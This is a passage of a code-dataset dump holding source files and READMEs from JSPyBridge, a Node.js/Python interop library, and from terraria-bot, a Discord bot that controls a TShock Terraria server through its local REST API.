self._exe.get(val)\n else:\n return val\n\n def __call__(self, *args, timeout=10):\n mT, v = (\n self._exe.initProp(self._pffid, self._pname, args)\n if self._es6\n else self._exe.callProp(self._pffid, self._pname, args, timeout)\n )\n if mT == \"fn\":\n return Proxy(self._exe, v)\n return self._call(self._pname, mT, v)\n\n def __getattr__(self, attr):\n # Special handling for new keyword for ES5 classes\n if attr == \"new\":\n return self._call(self._pname if self._pffid == self.ffid else \"\", \"class\", self._pffid)\n methodType, val = self._exe.getProp(self._pffid, attr)\n return self._call(attr, methodType, val)\n\n def __getitem__(self, attr):\n methodType, val = self._exe.getProp(self.ffid, attr)\n return self._call(attr, methodType, val)\n\n def __iter__(self):\n self._ix = 0\n if self.length == None:\n self._Keys = self._exe.keys(self.ffid)\n return self\n\n def __next__(self):\n if self._Keys:\n if self._ix < len(self._Keys):\n result = self._Keys[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n elif self._ix < self.length:\n result = self[self._ix]\n self._ix += 1\n return result\n else:\n raise StopIteration\n\n def __setattr__(self, name, value):\n if name in INTERNAL_VARS:\n object.__setattr__(self, name, value)\n else:\n return self._exe.setProp(self.ffid, name, value)\n\n def __setitem__(self, name, value):\n return self._exe.setProp(self.ffid, name, value)\n\n def __contains__(self, key):\n return True if self[key] is not None else False\n\n def valueOf(self):\n ser = self._exe.ipc(\"serialize\", self.ffid, \"\")\n return ser[\"val\"]\n\n def __str__(self):\n return self._exe.inspect(self.ffid, \"str\")\n\n def __repr__(self):\n return self._exe.inspect(self.ffid, \"repr\")\n\n def __json__(self):\n return {\"ffid\": self.ffid}\n\n def __del__(self):\n self._exe.free(self.ffid)\n" }, { "alpha_fraction": 0.5210319757461548, "alphanum_fraction": 0.5215927958488464, "avg_line_length": 22.460525512695312, "blob_id": "b5d6c400854b7726709771caabbd49fb509a0bcb", "content_id": "becf35469d65bcb36514715ed078c93737e34673", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1783, "license_type": "permissive", "max_line_length": 105, "num_lines": 76, "path": "/src/pythonia/StdioCom.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const cp = require('child_process')\nconst { join } = require('path')\n\nconst log = process.env.DEBUG ? console.log : () => {}\n\nclass StdioCom {\n constructor () {\n this.start()\n }\n\n start () {\n this.handlers = {}\n const args = [join(__dirname, 'interface.py')]\n const stdio = process.versions.electron ? 'pipe' : ['pipe', 'inherit', 'pipe']\n try {\n this.proc = cp.spawn(process.env.PYTHON_BIN || 'python3', args, { stdio })\n } catch (e) {\n if (e.code === 'ENOENT' && !process.env.PYTHON_BIN) this.proc = cp.spawn('python', args, { stdio })\n else throw e\n }\n this.proc.stderr.on('data', buf => {\n const data = String(buf)\n for (const line of data.split('\\n')) {\n let recv = line\n try {\n if (line.startsWith('{\"r\"')) {\n recv = JSON.parse(line)\n this.recieve(recv)\n } else if (line) {\n console.warn('[PyE]', line)\n }\n } catch {\n console.warn('[PyE]', line)\n }\n }\n })\n if (process.versions.electron) this.proc.stdout.pipe(process.stdout)\n }\n\n end () {\n this.proc.kill()\n this.proc = null\n }\n\n recieve (j) {\n log('[py -> js]', j)\n if (this.handlers[j.c]) {\n return this.handlers[j.c](j)\n }\n if (this.handlers[j.r]) {\n if (this.handlers[j.r](j)) {\n return\n }\n delete this.handlers[j.r]\n }\n }\n\n register (eventId, cb) {\n this.handlers[eventId] = cb\n }\n\n write (what, cb) {\n log('[js -> py]', what)\n const fb = JSON.stringify(what)\n this.proc.stdin.write(fb + '\\n')\n if (cb) this.register(what.r, cb)\n }\n\n writeRaw (what, r, cb) {\n log('[js -> py]', what)\n this.proc.stdin.write(what + '\\n')\n this.register(r, cb)\n }\n}\n\nmodule.exports = { StdioCom }\n" }, { "alpha_fraction": 0.7277875542640686, "alphanum_fraction": 0.7312968373298645, "avg_line_length": 37.81424331665039, "blob_id": "bcac136964a1178a4e2ff44fdb4131cc9d3086bd", "content_id": "02304fdf9f2077c11bf94f54e3046f66456e79d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12628, "license_type": "permissive", "max_line_length": 333, "num_lines": 323, "path": "/README.md", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# JSPyBridge\n[![NPM version](https://img.shields.io/npm/v/pythonia.svg)](http://npmjs.com/package/pythonia)\n[![PyPI](https://img.shields.io/pypi/v/javascript)](https://pypi.org/project/javascript/)\n[![Build Status](https://github.com/extremeheat/JSPyBridge/workflows/Node.js%20CI/badge.svg)](https://github.com/extremeheat/JSPyBridge/actions/workflows/)\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/extremeheat/jspybridge)\n\n\n\nInteroperate Node.js and Python. You can run Python from Node.js, *or* run Node.js from Python. **Work in progress.** \n\nRequires Node.js 16 and Python 3.8 or newer.\n\n## Key Features\n\n* Ability to call async and sync functions and get object properties with a native feel\n* Built-in garbage collection\n* Bidirectional callbacks with arbitrary arguments\n* Iteration and exception handling support\n* Object inspection allows you to easily `console.log` or `print()` any foreign objects\n* (Bridge to call Python from JS) Python class extension and inheritance. [See pytorch and tensorflow examples](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/pytorch-train.js).\n* (Bridge to call JS from Python) Native decorator-based event emitter support\n* (Bridge to call JS from Python) **First-class Jupyter Notebook/Google Colab support.** See some Google Colab uses below.\n\n\n## Basic usage example\n\nSee some examples [here](https://github.com/extremeheat/JSPyBridge/tree/master/examples). See [documentation](https://github.com/extremeheat/JSPyBridge#documentation) below and in [here](https://github.com/extremeheat/JSPyBridge/tree/master/docs).\n\n### Access JavaScript from Python\n\n\n```sh\npip3 install javascript\n```\n\n\n```py\nfrom javascript import require, globalThis\n\nchalk, fs = require(\"chalk\"), require(\"fs\")\n\nprint(\"Hello\", chalk.red(\"world!\"), \"it's\", globalThis.Date().toLocaleString())\nfs.writeFileSync(\"HelloWorld.txt\", \"hi!\")\n```\n\n### Access Python from JavaScript\n\nMake sure to have the dependencies installed before hand!\n\n```sh\nnpm i pythonia\n```\n\n```js\nimport { python } from 'pythonia'\n// Import tkinter\nconst tk = await python('tkinter')\n// All Python API access must be prefixed with await\nconst root = await tk.Tk()\n// A function call with a $ suffix will treat the last argument as a kwarg dict\nconst a = await tk.Label$(root, { text: 'Hello World' })\nawait a.pack()\nawait root.mainloop()\npython.exit() // Make sure to exit Python in the end to allow node to exit. You can also use process.exit.\n```\n\n### Examples\n[![Gitpod ready-to-code](https://img.shields.io/badge/Gitpod-ready--to--code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/extremeheat/jspybridge)\n\nCheck out some cool examples below! Try them on Gitpod! Click the Open in Gitpod link above, and then open the examples folder.\n\n\n[![PyTorch](https://www.vectorlogo.zone/logos/pytorch/pytorch-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/pytorch-train.js)\n[![numpy](https://www.vectorlogo.zone/logos/numpy/numpy-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/matplotlib.js)\n[![tensorflow](https://www.vectorlogo.zone/logos/tensorflow/tensorflow-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/javascript/tensorflow.js)\n[![mineflayer](https://www.vectorlogo.zone/logos/minecraft/minecraft-ar21.svg)](https://github.com/extremeheat/JSPyBridge/blob/master/examples/python/mineflayer.py)\n<!-- <img src=\"https://matplotlib.org/stable/_static/logo2_compressed.svg\" alt=\"matplotlib\" width=\"120\" height=\"70\">\n -->\n\n\n### Bridge feature comparison\n\nUnlike other bridges, you may notice you're not just writing Python code in JavaScript, or vice-versa. You can operate on objects\non the other side of the bridge as if the objects existed on your side. This is achieved through real interop support: you can call\ncallbacks, and do loss-less function calls with any arguments you like (with the exception of floating points percision of course).\n\n| | python(ia) bridge | javascript bridge | [npm:python-bridge](https://www.npmjs.com/package/python-bridge) |\n|---|---|---|---|\n| Garbage collection | ✔ | ✔ | ❌ |\n| Class extension support | ✔ | Not built-in (rare use case), can be manually done with custom proxy | ❌ |\n| Passthrough stdin | ❌ (Standard input is not piped to bridge processes. Instead, listen to standard input then expose an API on the other side of the bridge recieve the data.) | ❌ | ✔ |\n| Passthrough stdout, stderr | ✔ | ✔ | ✔ |\n| Long-running sync calls | ✔ | ✔ | ✔ |\n| Long-running async calls | ❌ (need to manually create new thread) | ✔ (AsyncTask) | ❌ (need to manually create new thread) |\n| Callbacks | ✔ | ✔ | ❌ |\n| Call classes | ✔ | ✔ | |\n| Iterators | ✔ | ✔ | ❌ |\n| Inline eval | ✔ | ✔ | |\n| Dependency Management | ❌ | ✔ | ❌ |\n| Local File Imports | ✔ | ✔ | ❌ |\n| Error Management | ✔ | ✔ | ✔ |\n| Object inspection | ✔ | ✔ | ❌ |\n\n## Who's using it\n* [PrismarineJS/mineflayer](https://github.com/PrismarineJS/mineflayer) -- [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/PrismarineJS/mineflayer/blob/master/docs/mineflayer.ipynb)\n\n# Documentation\n\n## From Python\n\nYou can import the bridge module with \n```py\nfrom javascript import require\n```\n\nThis will import the require function which you can use just like in Node.js. This is a slightly\nmodified require function which does dependency management for you. The first paramater is the name\nor location of the file to import. Internally, this calls the ES6 dynamic `import()` function. Which\nsupports both CommonJS and ES6 modules.\n\nIf you are passing a module name (does not start with / or include a .) such as 'chalk', it will search \nfor the dependency in the internal node_module folder and if not found, install it automatically. \nThis install will only happen once, it won't impact startup afterwards.\n\nThe second paramater to the built-in require function is the version of the package you want, for\nexample `require('chalk', '^3')` to get a version greater than major version 3. Just like you would\nif you were using `npm install`. It's reccomended to only use the major version as the name and version\nwill be internally treated as a unique package, for example 'chalk--^3'. If you leave this empty, \nwe will install `latest` version instead, or use the version that may already be installed globally.\n\n### Usage\n\n* All function calls to JavaScript are thread synchronous\n* ES6 classes can be constructed without new\n* ES5 classes can be constructed with the .new psuedo method\n* Use `@On` decorator when binding event listeners. Use `off()` to disable it.\n* All callbacks run on a dedicated callback thread. DO NOT BLOCK in a callback or all other events will be blocked. Instead:\n* Use the @AsyncTask decorator when you need to spawn a new thread for an async JS task.\n\nFor more, see [docs/python.md](https://github.com/extremeheat/JSPyBridge/blob/master/docs/python.md).\n\n### Usage\n\n<details>\n <summary>👉 Click here to see some code usage examples 👈</summary>\n\n### Basic import\n\nLet's say we have a file in JS like this called `time.js` ...\n```js\nfunction whatTimeIsIt() {\n return (new Date()).toLocaleString()\n}\nmodule.exports = { whatTimeIsIt }\n```\n\nThen we can call it from Python !\n```py\nfrom javascript import require\ntime = require('./time.js')\nprint(time.whatTimeIsIt())\n```\n\n### Event emitter\n\n*You must use the provided On, Once, decorator and off function over the normal dot methods.*\n\nemitter.js\n```js\nconst { EventEmitter } = require('events')\nclass MyEmitter extends EventEmitter {\n counter = 0\n inc() {\n this.emit('increment', ++this.counter)\n }\n}\nmodule.exports = { MyEmitter }\n```\n\nlistener.py\n```py\nfrom javascript import require, On, off\nMyEmitter = require('./emitter.js')\n# New class instance\nmyEmitter = MyEmitter()\n# Decorator usage\n@On(myEmitter, 'increment')\ndef handleIncrement(this, counter):\n print(\"Incremented\", counter)\n # Stop listening. `this` is the this variable in JS.\n off(myEmitter, 'increment', handleIncrement)\n# Trigger the event handler\nmyEmitter.inc()\n```\n\n### ES5 class\n\nes5.js\n```js\nfunction MyClass(num) {\n this.getNum = () => num\n}\nmodule.exports = { MyClass }\n```\n\n\nes5.py\n```py\nMyEmitter = require('./es5.js')\nmyClass = MyClass.new(3)\nprint(myClass.getNum())\n```\n\n### Iteration\nitems.js\n```js\nmodule.exports = { items: [5, 6, 7, 8] }\n```\n\nitems.py\n```py\nitems = require('./items.js')\nfor item in items:\n print(item)\n```\n\n### Callback\n\ncallback.js\n```js\nexport function method(cb, salt) {\n cb(42 + salt)\n}\n```\ncallback.py\n```py\nmethod = require('./callback').method\n# Example with a lambda, but you can also pass a function ref\nmethod(lambda v: print(v), 2) # Prints 44\n```\n\n</details>\n\n## From JavaScript\n\n* All the Python APIs are async. You must await them all. \n* Use `python.exit()` or `process.exit()` at the end to quit the Python process.\n* This library doesn't manage the packaging. \n * Right now you need to install all the deps from pip globally, but later on we may allow loading from pip-envs.\n* When you do a normal Python function call, you can supply \"positional\" arguments, which must \n be in the correct order to what the Python function expects.\n* Some Python objects accept arbitrary keyword arguments. You can call these functions by using\n the special `$` function syntax. \n * When you do a function call with a `$` before the parenthesis, such as `await some.pythonCall$()`, \n the final argument is evaluated as a kwarg dictionary. You can supply named arguments this way.\n* Property access with a $ at the end acts as a error suppression operator. \n * Any errors will be ignored and instead undefined will be returned\n* See [docs/javascript.md](docs/javascript.md) for more docs, and the examples for more info\n\n### Usage\n\n<details>\n <summary>👉 Click here to see some code usage examples 👈</summary>\n\n### Basic import\n\nLet's say we have a file in Python like this called `time.py` ...\n```py\nimport datetime\ndef what_time_is_it():\n return str(datetime.datetime.now())\n```\n\nThen we can call it from JavaScript !\n```js\nimport { python } from 'pythonia'\nconst time = await python('./time.py')\nconsole.log(\"It's\", await time.what_time_is_it())\npython.exit()\n```\n\n### Iterating\n\n* When iterating a Python object, you *must* use a `for await` loop instead of a normal `for-of` loop.\n\niter.py\n```py\nimport os\ndef get_files():\n for f in os.listdir():\n yield f\n```\n\niter.js\n```js\nconst iter = await python('./iter.py')\nconst files = await iter.get_files()\nfor await (const file of files) {\n console.log(file)\n}\n```\n</details>\n\n## Details\n* When doing a function call, any foreign objects will be sent to you as a reference. For example,\n if you're in JavaScript and do a function call to Python that returns an array, you won't get a\n JS array back, but you will get a reference to the Python array. You can still access the array\n normally with the [] notation, as long as you use await. If you would like the bridge to turn\n the foreign refrence to something native, you can request a primitive value by calling `.valueOf()`\n on the Python array. This would give you a JS array. It works the same the other way around.\n* The above behavior makes it very fast to pipe data from one function onto another, avoiding costly\n conversions.\n* This above behavior is not present for callbacks and function parameters. The bridge will try to\n serialize what it can, and will give you a foreign reference if it's unable to serialize something.\n So if you pass a JS object, you'll get a Python dict, but if the dict contains something like a class,\n you'll get a reference in its place.\n\n#### Notable details\n\n* The `ffid` keyword is reserved. You cannot use it in variable names, object keys or values as this is used to internlly track objects.\n* On the bridge to call JavaScript from Python, due to the limiatations of Python and cross-platform IPC, we currently communicate over standard error which means that JSON output in JS standard error can interfere with the bridge. The same issue exists on Windows with python. You are however very unlikely to have issues with this.\n\n* You can set the Node.js/Python binary paths by setting the `NODE_BIN` or `PYTHON_BIN` enviornment variables before importing the library. Otherwise, the `node` and `python3` or `python` binaries will be called relative to your PATH enviornment variable. \n" }, { "alpha_fraction": 0.5371459126472473, "alphanum_fraction": 0.5446285605430603, "avg_line_length": 22.387500762939453, "blob_id": "39f3f8957397fc82d8014e064624dd0ba700c331", "content_id": "a86a4b945b584fa2f4e4200bc513f4f4c71b7d92", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1871, "license_type": "permissive", "max_line_length": 113, "num_lines": 80, "path": "/src/pythonia/WebsocketCom.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const cp = require('child_process')\nconst { join } = require('path')\nconst WS = typeof WebSocket === 'undefined' ? require('ws') : WebSocket\n\nconst log = process.env.DEBUG ? console.log : () => {}\n\nclass StdioCom {\n constructor (ver = 3) {\n this.python = ver === 3 ? 'python3' : 'python2'\n this.handlers = {}\n this.sendQ = []\n this.start()\n }\n\n async start () {\n this.proc = cp.spawn?.(this.python, [join(__dirname, 'ws.py')], { stdio: ['inherit', 'inherit', 'inherit'] })\n\n this.sock = new WS('ws://127.0.0.1:8768/')\n const onMessage = message => {\n const j = JSON.parse(message)\n if (j.c === 'stderr') {\n console.log('PyE', message.val)\n } else if (j.c === 'stdout') {\n console.log('PyO', message.val)\n } else {\n this.recieve(j)\n }\n }\n const onOpen = () => {\n for (const q of this.sendQ) {\n this.sock.send(q)\n }\n }\n this.sock.on?.('message', onMessage)\n this.sock.onmessage = message => onMessage(message.data)\n this.sock.on?.('open', onOpen)\n this.sock.onopen = onOpen\n\n this.proc?.on('error', console.warn)\n }\n\n end () {\n this.proc?.kill()\n this.sock.close()\n }\n\n recieve (j) {\n log('[py -> js]', j)\n if (this.handlers[j.c]) {\n return this.handlers[j.c](j)\n }\n if (this.handlers[j.r]) {\n if (this.handlers[j.r](j)) {\n return\n }\n delete this.handlers[j.r]\n }\n }\n\n register (eventId, cb) {\n this.handlers[eventId] = cb\n }\n\n write (what, cb) {\n log('[js -> py]', what)\n const fb = JSON.stringify(what)\n if (!this.sock) this.sendQ.push(fb)\n else this.sock.send(fb)\n this.register(what.r, cb)\n }\n\n writeRaw (what, r, cb) {\n log('[js -> py]', what)\n if (!this.sock) this.sendQ.push(what)\n else this.sock.send(what)\n this.register(r, cb)\n }\n}\n\nmodule.exports = { StdioCom }\n" } ]
40
AnkisCZ/terraria-bot
https://github.com/AnkisCZ/terraria-bot
056235b1263261340136bd9967a1fdc98219b8d4
fd9e262e5af3a4b2da9f72fe4b7f34143178838a
1f9e533fab4ff003ae31e87f48bd9ea21c4d5794
refs/heads/master
2021-10-21T16:06:28.501032
2019-03-05T00:55:03
2019-03-05T00:55:03
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.745464563369751, "alphanum_fraction": 0.7493128180503845, "avg_line_length": 57.67741775512695, "blob_id": "3ad0da903fe9c43def0f417488cd83e288a3099a", "content_id": "df8de2d70348a5d0b3bac351e6ed2e08bffb31c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 256, "num_lines": 31, "path": "/README.md", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "# terraria-bot\n\nThis is a simple Terraria bot to control your TShock server from a Discord Channel. To use this feature, you will have to enable [REST Services from your TShock server](https://tshock.readme.io/v4.3.22/reference).\n\n - [TShock Server](https://github.com/Pryaxis/TShock/releases) is required.\n - **startup.bat** - This script should be used to start your TShock server on your windows machine\n - **startup.sh** - This script should be used to start your TShock server on your unix machine (_pending_)\n\n### Tech\n\nTo run terraria-bot you need the following technologies\n\n* [python](https://www.python.org/) - Python version 3.x is required\n* **python libraries** - The file requirements.txt specifies all the required libraries and modules (_produced by pigar_)\n\n### Installation\n\n - **TShock** should be installed and configured to expose REST Services on your localhost.\n - **startup script** should be located at your TShock root folder\n - You have to configure your [Discord Bot Application](https://github.com/SinisterRectus/Discordia/wiki/Setting-up-a-Discord-application)\n - Populate your token on the [bot.py](https://github.com/jobtravaini/terraria-bot/blob/master/Bot.py) constant **TOKEN**\n\n### Configuration\n\n - It is required to [create an Admin user on your TShock Server](https://tshock.readme.io/docs/getting-started)\n - It is required to configure your TShock Admin username and password (_**USERNAME** and **PASSWORD** constants_) on the [server_adapter.py](https://github.com/jobtravaini/terraria-bot/blob/master/tshock/Server.py) file (_REST API requires admin access_)\n \n### Running\n\n - Add your Bot to your Discord Channel. Suggestion: [oauth2 URL](https://discordapp.com/developers/docs/topics/oauth2)\n - Start your server using the **startup** script and run Bot.py file\n" }, { "alpha_fraction": 0.6753086447715759, "alphanum_fraction": 0.6753086447715759, "avg_line_length": 34.21739196777344, "blob_id": "da67d859cad3fab95ef77fac9d3dc8a61f956aac", "content_id": "a8f3e665f115093eba654b370741fd14168d1f2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 810, "license_type": "no_license", "max_line_length": 53, "num_lines": 23, "path": "/command/command_map.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import tshock.server_adapter as Server\nimport util.ip_handler as ExternalIP\n\n_map = dict()\n\n# [ SERVICE , IS_AUTHORIZATION_REQUIRED]\n_map['!ip'] = [ExternalIP.get_my_external_ip, False]\n_map['!status'] = [Server.server_status, False]\n_map['!angler'] = [Server.server_clear_angler, False]\n_map['!restart'] = [Server.server_restart, True]\n_map['!save'] = [Server.save_world, True]\n_map['!night'] = [Server.server_night_time, True]\n_map['!day'] = [Server.server_day_time, True]\n_map['!eclipse'] = [Server.server_eclipse, True]\n_map['!fullmoon'] = [Server.server_full_moon, True]\n_map['!bloodmoon'] = [Server.server_blood_moon, True]\n_map['!rain'] = [Server.server_rain, True]\n_map['!sandstorm'] = [Server.server_sandstorm, True]\n_map['!help'] = [Server.server_help, True]\n\n\ndef get_command_map():\n return _map\n" }, { "alpha_fraction": 0.6929648518562317, "alphanum_fraction": 0.6964824199676514, "avg_line_length": 27.826086044311523, "blob_id": "8463f0be13bb35f702c43f82bc90c0d6a92690dd", "content_id": "5872329bf1e9e75f0da93a7d00e951b159fb9f3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1990, "license_type": "no_license", "max_line_length": 81, "num_lines": 69, "path": "/bot.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import time\nimport discord\nimport logging.config\nimport command.command_map as CommandMap\n\nLOG_COMMAND_AUTHORIZATION_GRANTED = 'Service {0}: Authorization Granted'\nLOG_COMMAND_AUTHORIZATION_DENIED = 'Service {0}: Authorization Denied'\nAUTHORIZATION_DENIED_MESSAGE='You do not have the permission to use this command'\nLOG_COMMAND_PATTERN = 'User {0} invoked {1} command'\nLOG_LOGIN_MESSAGE = 'Logged in. Name: {0} - User ID: {1}'\nTOKEN = 'YOUR_TOKEN_HERE'\n\nlogging.config.fileConfig('logging.conf')\nlogger = logging.getLogger(__name__)\n\ncommand_map = CommandMap.get_command_map()\nclient = discord.Client()\n\n\ndef _check_authorization(roles):\n for role in roles:\n if role.name == 'TBotAdmin':\n return True\n\n return False\n\n\ndef _execute_command(message):\n if message.content in command_map:\n logger.info(LOG_COMMAND_PATTERN.format(message.author, message.content))\n service, is_authorization_required = command_map.get(message.content)\n\n if is_authorization_required:\n return _execute_role_based_service(service, message.author.roles)\n else:\n return service()\n\n\ndef _execute_role_based_service(service, roles, *args):\n if _check_authorization(roles):\n logger.info(LOG_COMMAND_AUTHORIZATION_GRANTED.format(service.__name__))\n return service(*args)\n else:\n logger.info(LOG_COMMAND_AUTHORIZATION_DENIED.format(service.__name__))\n return AUTHORIZATION_DENIED_MESSAGE\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n\n result_message = _execute_command(message)\n\n if result_message:\n await client.send_message(message.channel, result_message)\n\n\[email protected]\nasync def on_ready():\n logger.info(LOG_LOGIN_MESSAGE.format(client.user.name, client.user.id))\n\n\nwhile True:\n try:\n client.loop.run_until_complete(client.start(TOKEN))\n except Exception:\n logger.info('Reconnecting...')\n time.sleep(5)\n\n" }, { "alpha_fraction": 0.6281428337097168, "alphanum_fraction": 0.6352857351303101, "avg_line_length": 27.571428298950195, "blob_id": "ca3f593b8de35cb0707bd10527ed0c9be40eaf6d", "content_id": "e3e32807d6846e606d4e46614025061da671b07c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7000, "license_type": "no_license", "max_line_length": 119, "num_lines": 245, "path": "/tshock/server_adapter.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import requests\n\n# BASE\nTOKEN = None\nUSERNAME = 'tbot'\nPASSWORD = 'admin'\n\n# SERVICES\nSERVER_URL = 'http://127.0.0.1:7878'\n\nRESTART_SERVER_SERVICE = SERVER_URL + '/v2/server/off'\nPLAYER_LIST_SERVICE = SERVER_URL + '/v2/players/list'\nTEST_TOKEN_SERVICE = SERVER_URL + '/tokentest'\nSAVE_WORLD_SERVICE = SERVER_URL + '/v2/world/save'\nRAW_CMD_SERVICE = SERVER_URL + '/v3/server/rawcmd'\nSTATUS_SERVICE = SERVER_URL + '/status'\nLOGIN_SERVICE = SERVER_URL + '/v2/token/create'\n\n# MESSAGING\nSERVER_RESTARTING_MESSAGE = 'The Server is restarting...'\nCRITICAL_ERROR_MESSAGE = 'Error. Please, validate with your server provider'\nEMPTY_SERVER_MESSAGE = 'Empty Server'\nWORLD_SAVED_MESSAGE = 'World Saved'\nNIGHT_TIME_MESSAGE = 'Setting Server time to Night (19:30 PM)'\nBLOOD_MOON_MESSAGE = 'The Server is now running a Blood Moon Event'\nFULL_MOON_MESSAGE = 'The Server is now Full Moon Phase'\nSANDSTORM_MESSAGE = 'Sandstorm: {0}'\nDAY_TIME_MESSAGE = 'Setting Server time to Day (04:30 AM)'\nECLIPSE_MESSAGE = 'The Server is now running an Eclipse Event'\nRESTART_MESSAGE = 'The Server will be restarted'\nANGLER_MESSAGE = 'Angler has new quests now'\nGENERIC_ERROR = 'Error. Please, restart the server'\nRAIN_MESSAGE = 'Raining: {0}'\nSTATUS_MESSAGE = 'Server Name: {0}\\n' \\\n 'Players: {1}\\n' \\\n 'Running for: {2}'\n\n# Help Message\nHELP_SERVICE_MESSAGE = 'Services:\\n' \\\n '!ip - returns the Server IP\\n' \\\n '!status - returns the Server Status\\n' \\\n '!angler - reset Angler\\'s Quest\\n' \\\n '\\n' \\\n 'Admin Services:\\n' \\\n '!bloodmoon - invoke Blood Moon event\\n' \\\n '!sandstorm - create sandstorms\\n' \\\n '!eclipse - invoke Eclipse event\\n' \\\n '!restart - restart the Server\\n' \\\n '!night - set the time to Night Time (19:30 PM)\\n' \\\n '!save - save the World\\n' \\\n '!rain - set weather to Rain\\n' \\\n '!day - set time to Day Time (04:30 AM)'\n\n# Server State\nrain_state = False\nsandstorm_state = False\n\n\ndef _consume_service(url, parameters=None):\n if parameters:\n return requests.get(url, params=parameters).json()\n else:\n return requests.get(url, params=_get_token()).json()\n\n\ndef _validate_response(response):\n if response and 'status' in response and response['status'] == '200':\n return True\n else:\n return False\n\n\ndef _get_token():\n global TOKEN\n\n if TOKEN and _validate_token():\n return {'token': TOKEN}\n else:\n TOKEN = _consume_service(url=LOGIN_SERVICE, parameters={'username': USERNAME, 'password': PASSWORD})['token']\n return {'token': TOKEN}\n\n\ndef _validate_token():\n response = _consume_service(TEST_TOKEN_SERVICE, parameters={'token': TOKEN})\n\n if _validate_response(response):\n return True\n else:\n return False\n\n\ndef _get_player_list():\n response = _consume_service(PLAYER_LIST_SERVICE)\n\n if _validate_response(response):\n player_list = list()\n players = response['players']\n\n for player in players:\n player_list.append(player['nickname'])\n\n if len(player_list) > 0:\n return ', '.join(player_list)\n else:\n return EMPTY_SERVER_MESSAGE\n else:\n return GENERIC_ERROR\n\n\ndef server_status():\n response = _consume_service(STATUS_SERVICE)\n\n if _validate_response(response):\n return STATUS_MESSAGE.format(response['world'], _get_player_list(), response['uptime'])\n else:\n return GENERIC_ERROR\n\n\ndef save_world():\n response = _consume_service(SAVE_WORLD_SERVICE)\n\n if _validate_response(response):\n return WORLD_SAVED_MESSAGE\n else:\n return GENERIC_ERROR\n\n\ndef server_restart():\n token_parameter = _get_token()\n server_parameter = {'confirm': True, 'message': RESTART_MESSAGE, 'nosave': False}\n parameters = {**token_parameter, **server_parameter}\n\n response = _consume_service(url=RESTART_SERVER_SERVICE, parameters=parameters)\n\n if _validate_response(response):\n return SERVER_RESTARTING_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef _invoke_raw_command(server_parameter):\n token_parameter = _get_token()\n parameters = {**token_parameter, **server_parameter}\n\n return _consume_service(RAW_CMD_SERVICE, parameters=parameters)\n\n\ndef server_night_time():\n server_parameter = {'cmd': '/time 19:30'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return NIGHT_TIME_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_day_time():\n server_parameter = {'cmd': '/time 04:30'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return DAY_TIME_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_eclipse():\n server_parameter = {'cmd': '/eclipse'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return ECLIPSE_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_full_moon():\n server_parameter = {'cmd': '/fullmoon'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return FULL_MOON_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_rain():\n global rain_state\n\n if rain_state:\n command = 'stop'\n else:\n command = 'start'\n\n server_parameter = {'cmd': '/rain {0}'.format(command)}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n rain_state = not rain_state\n return RAIN_MESSAGE.format(rain_state)\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_sandstorm():\n global sandstorm_state\n\n if sandstorm_state:\n command = 'stop'\n else:\n command = 'start'\n\n server_parameter = {'cmd': '/sandstorm {0}'.format(command)}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n sandstorm_state = not sandstorm_state\n return SANDSTORM_MESSAGE.format(sandstorm_state)\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_blood_moon():\n server_parameter = {'cmd': '/bloodmoon'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return BLOOD_MOON_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_clear_angler():\n server_parameter = {'cmd': '/clearangler'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return ANGLER_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_help():\n return 